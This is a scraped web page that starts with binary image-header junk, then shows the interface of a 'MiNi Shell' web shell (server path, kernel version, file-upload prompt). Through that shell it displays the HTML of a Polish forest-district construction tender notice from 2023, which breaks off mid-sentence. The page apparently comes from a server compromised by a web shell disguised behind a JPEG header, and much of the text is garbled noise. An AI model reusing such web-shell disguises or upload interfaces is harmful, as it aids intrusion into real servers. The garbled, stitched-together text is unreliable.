JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230330/0015705201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa podwójnej kancelarii dla Leśnictw Skorodne i Polana oraz przebudowy i remonty budynków w Nadleśnictwie Lutowiska w 2023 roku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Lutowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370014521</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lutowiska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lutowiska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-713</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lutowiska@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.lutowiska.krosno.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa podwójnej kancelarii dla Leśnictw Skorodne i Polana oraz przebudowy i remonty budynków w Nadleśnictwie Lutowiska w 2023 roku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f88f63f2-cdfd-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00157052</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00388654/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa podwójnej kancelarii dla Leśnictw Skorodne i Polana oraz przebudowy i remonty budynków w Nadleśnictwie Lutowiska w 2023 roku.. ZG.270.1.7.2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_lutowiska <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Komunikacja ustna, w tym drogą telefoniczna, jest dopuszczalna w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia oraz ofert, o ile jej treść jest udokumentowana.<br/>3. Komunikacja między Zamawiającym, a Wykonawcami w niniejszym postępowaniu odbywa się przy użyciu platformy zakupowej Open Nexus - platformazakupowa.pl (dalej: „Platforma”): https://platformazakupowa.pl/pn/lasy_lutowiska lub przy użyciu poczty elektronicznej: lutowiska@krosno.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty, <br/>oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w <br/>postępowaniu, a także innych oświadczeń lub dokumentów składanych wraz z ofertą następuje wyłącznie przy użyciu Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące w szczególności logowania, składania ofert, składania wniosków o wyjaśnienie treści SWZ, wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz innych informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z Platformy https://platformazakupowa.pl/strona/45-instrukcje, w zakładce „Instrukcje dla Wykonawców” oraz w Regulaminie korzystania z Platformy, dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod wskazanym wyżej linkiem, w zakładce „Regulamin” oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją <br/>składania ofert/wniosków dostępną pod wskazanym wyżej linkiem, i stosować do niej.<br/>5. Limit objętości plików lub spakowanych folderów w zakresie całej oferty, oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także innych oświadczeń lub dokumentów składanych wraz z ofertą wynosi 10 plików lub spakowanych folderów (pliki można skompresować zgodnie z ust. 9), przy maksymalnej wielkości pojedynczego pliku 150 MB. Podczas komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest: Państwowe Gospodarstwo Leśne Lasy Nadleśnictwo Lutowiska 4 38-713<br/>Lutowiska;<br/>2. Przedstawicielem administratora jest Nadleśniczy Rafał Osiecki, z administratorem można skontaktować się pisemnie pod<br/>Adresem Nadleśnictwo Lutowiska 4 38-713 Lutowiska, za pomocą poczty elektronicznej na adres e-mail:<br/>lutowiska@krosno.lasy.gov.pl, telefonicznie pod numerem: + 48 13 461 01 68;<br/>3. Informację o przetwarzaniu danych osobowych przez Zamawiającego zawiera pkt. 22 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje dot. RODO zawiera klauzula<br/>informacyjna dotycząca przetwarzania danych osobowych w pkt. 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.1.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1279180,35 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 0 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty ogólnobudowlane i instalacyjne budowy budynku kancelarie dwóch leśnictw Skorodne i Polana na działce, nr ew. 649/4 w miejscowości Polana. Projektowany budynek o pow. zabudowy 77,14 m2 jest budynkiem wolnostojącym, parterowym bez poddasza użytkowego i nie podpiwniczonym. Budynek na płycie fundamentowej żelbetowej w technologii szkieletu drewnianego, pokryty balachodachówką. Instalacje: elektryczna 3-faz, odgromowa, wod-kan, ogrzewanie elektryczne grzejnikowe oraz instalacja fotowoltaiczna o mocy 6 kW. Zamówienie obejmuje również wykonanie: studni głębinowej i zbiornika na ścieki bytowe wraz z przyłączami, utwardzonego dojazdu, miejsc postojowych, chodnika, pochylni dla osób niepełnosprawnych, ogrodzenia panelowego z bramą przesuwną i furtką oraz wiaty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 811175,69 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)Zamawiający jest uprawniony zlecić Wykonawcy do realizacji zakres rzeczowy obejmujący roboty budowlane analogiczne jak opisane w SWZ dla zamówienia podstawowego („Opcja”). Zamawiający nie jest zobowiązany do zlecenia robót objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>2) Zamawiający zleci Wykonawcy wykonanie Opcji, o ile zajdą następujące <br/>okoliczności: Zamawiający uzyska dodatkowe środki finansowe na realizację <br/>zamówienia, po złożeniu w formie pisemnej z odpowiednim, tj. co najmniej 3 <br/>dniowym, wyprzedzeniem stosownego oświadczenia Zamawiającego o <br/>uruchomieniu opcji zawierającego określenie zakresu prac, które powinny zostać wykonane w ramach Opcji, a także terminu ich wykonania (rozpoczęcia <br/>i zakończenia). <br/>3) Jeżeli wykonanie zleconych w ramach Opcji prac w pierwotnie ustalonym terminie umownym będzie niemożliwe, to termin realizacji umowy może ulec przedłużeniu maksymalnie o czas niezbędny do wykonania Opcji.<br/>4) Koszt robót będących przedmiotem Opcji nie może przekroczyć 20% wartości umownej podstawowego zakresu rzeczowego określonego w opisie przedmiotu zamówienia.<br/>5) Zlecanie robót będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak również realizacja uprawnień Zamawiającego wynikających z umowy, w tym realizacja prawa do odstąpienia od umowy następować będzie na analogicznych zasadach, jak w przypadku prac będących przedmiotem umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50% wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdej części zamówienia Zamawiający będzie się kierował <br/> następującymi kryteriami oceny ofert:<br/> <br/> Cena oferowana brutto - 60 %,<br/> Wydłużenie okresu gwarancji - 40 %<br/><br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>a) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>W c = ------------ x 100 pkt. x 60 % <br/> Co <br/>gdzie:<br/>W c - liczba punktów w ramach kryterium „Cena”,<br/>C n - najniższa cena spośród ofert ocenianych,<br/>C o - cena oferty ocenianej. <br/>Ocenie w ramach kryterium „cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załączniki nr 1 do SWZ).<br/><br/>b) W ramach kryterium „Wydłużenie okresu gwarancji - Wg” oceniane będzie wydłużenie okresu Gwarancji na wykonane roboty budowlane w stosunku do minimalnego Okresu Gwarancji (tj. powyżej 24 miesięcy od dnia odbioru końcowego robót). Minimalny okres Gwarancji jaki będzie obowiązywał niezależnie od oferty Wykonawcy wynosi 24 miesiące i będzie liczony począwszy od daty odbioru końcowego robót. Do oceny w ramach kryterium <br/>zostanie przyjęty Okres Gwarancji zawarty w formularzu oferty. Wydłużenie Okresu Gwarancji należy podać w pełnych miesiącach zgodnie z poniższym schematem (tj. 3 miesięcy, albo krotność). Ilość miesięcy należy podać w liczbach naturalnych (bez ułamków). W przypadku podania w formularzu (załączniki nr 2 do SWZ) oferty liczby miesięcy z ułamkami, liczby ujemnej albo niepodania w formularzu oferty żadnej wartości liczbowej, oferta taka otrzyma 0 (słownie: zero) punktów w tym kryterium. W ramach kryterium „Okres Gwarancji” ocena ofert zostanie dokonana przy zastosowaniu <br/>następującego schematu: <br/><br/>wydłużenie okresu gwarancji o: <br/><br/>liczba punktów:<br/>6 miesięcy 10 pkt.<br/>12 miesięcy 20 pkt.<br/>18 miesięcy 30 pkt.<br/>24 miesiące 40 pkt.<br/><br/>W przypadku zaoferowania wydłużenia Gwarancji ponad 24 miesięcy, do oceny ofert zostanie przyjęte wydłużenie okresu gwarancji tylko o 24 miesiące. <br/>3. Za najkorzystniejszą ofertę w danej części zamówienia uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert, wyliczoną zgodnie ze wzorem: <br/>O = Wc + Wg<br/>Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty ogólnobudowlane i instalacyjne obejmujące rozbiórkę murowano-drewnianej, pokrytej płytami azbestowo-cementowymi falistymi części budynku gospodarczego (ok.101 m2) wraz z zadaszeniami i płytą balkonową oraz przebudowę pozostałej części (51,3 m2 pow. użytkowej) stajnia i kurnik na pomieszczenia garażowe i gospodarcze, w <br/>tym: również wymianę rynien i rur spustowych, stolarki okiennej i drzwiowej, montaż bramy garażowej z napędem elektrycznym, uzupełnienia przemurowań, tynków, wymianę istniejących posadzek betonowych z montażem posadzek płytkowych (gres techniczny), podokienników, <br/>malowanie emulsyjne wewnętrzne, przemurowanie komina, wymianę instalacji odgromowej, elektrycznej wewnętrznej 3-fazy, wykonanie elewacji w technol. tynku cienkowarstwowego, wiaty postojowej oraz utylizację materiałów porozbiórkowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 279701,31 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)Zamawiający jest uprawniony zlecić Wykonawcy do realizacji zakres rzeczowy obejmujący roboty budowlane analogiczne jak opisane w SWZ dla zamówienia podstawowego („Opcja”). Zamawiający nie jest zobowiązany do zlecenia robót objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>2) Zamawiający zleci Wykonawcy wykonanie Opcji, o ile zajdą następujące <br/>okoliczności: Zamawiający uzyska dodatkowe środki finansowe na realizację <br/>zamówienia, po złożeniu w formie pisemnej z odpowiednim, tj. co najmniej 3 <br/>dniowym, wyprzedzeniem stosownego oświadczenia Zamawiającego o <br/>uruchomieniu opcji zawierającego określenie zakresu prac, które powinny zostać wykonane w ramach Opcji, a także terminu ich wykonania (rozpoczęcia <br/>i zakończenia). <br/>3) Jeżeli wykonanie zleconych w ramach Opcji prac w pierwotnie ustalonym terminie umownym będzie niemożliwe, to termin realizacji umowy może ulec przedłużeniu maksymalnie o czas niezbędny do wykonania Opcji.<br/>4) Koszt robót będących przedmiotem Opcji nie może przekroczyć 20% wartości umownej podstawowego zakresu rzeczowego określonego w opisie przedmiotu zamówienia.<br/>5) Zlecanie robót będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak również realizacja uprawnień Zamawiającego wynikających z umowy, w tym realizacja prawa do odstąpienia od umowy następować będzie na analogicznych zasadach, jak w przypadku prac będących przedmiotem umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50% wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdej części zamówienia Zamawiający będzie się kierował <br/> następującymi kryteriami oceny ofert:<br/> <br/> Cena oferowana brutto - 60 %,<br/> Wydłużenie okresu gwarancji - 40 %<br/><br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>a) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>W c = ------------ x 100 pkt. x 60 % <br/> Co <br/>gdzie:<br/>W c - liczba punktów w ramach kryterium „Cena”,<br/>C n - najniższa cena spośród ofert ocenianych,<br/>C o - cena oferty ocenianej. <br/>Ocenie w ramach kryterium „cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załączniki nr 1 do SWZ).<br/><br/>b) W ramach kryterium „Wydłużenie okresu gwarancji - Wg” oceniane będzie wydłużenie okresu Gwarancji na wykonane roboty budowlane w stosunku do minimalnego Okresu Gwarancji (tj. powyżej 24 miesięcy od dnia odbioru końcowego robót). Minimalny okres Gwarancji jaki będzie obowiązywał niezależnie od oferty Wykonawcy wynosi 24 miesiące i będzie liczony począwszy od daty odbioru końcowego robót. Do oceny w ramach kryterium <br/>zostanie przyjęty Okres Gwarancji zawarty w formularzu oferty. Wydłużenie 